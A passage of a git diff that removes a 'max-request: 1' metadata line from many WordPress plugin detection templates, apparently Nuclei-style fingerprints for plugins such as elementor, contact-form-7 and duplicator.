info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 